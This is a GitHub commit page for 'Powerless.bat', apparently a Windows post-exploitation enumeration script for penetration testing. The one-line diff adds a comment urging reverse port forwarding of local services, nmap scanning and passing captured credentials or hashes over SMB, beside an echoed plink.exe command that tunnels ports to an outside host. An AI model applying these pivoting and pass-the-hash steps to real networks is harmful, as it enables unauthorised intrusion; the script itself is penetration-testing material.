Skip to content

Commit

Permalink
Update Powerless.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
gladiatx0r committed Jan 11, 2019
1 parent 0ebe45a commit 5e3e901
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions Powerless.bat
Original file line number Diff line number Diff line change
Expand Up @@ -243,6 +243,7 @@ REM arp -A
echo.

echo ------- Current connections and listening ports -------
:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?
netstat -ano
echo.
echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------
Expand Down

0 comments on commit 5e3e901

Please sign in to comment.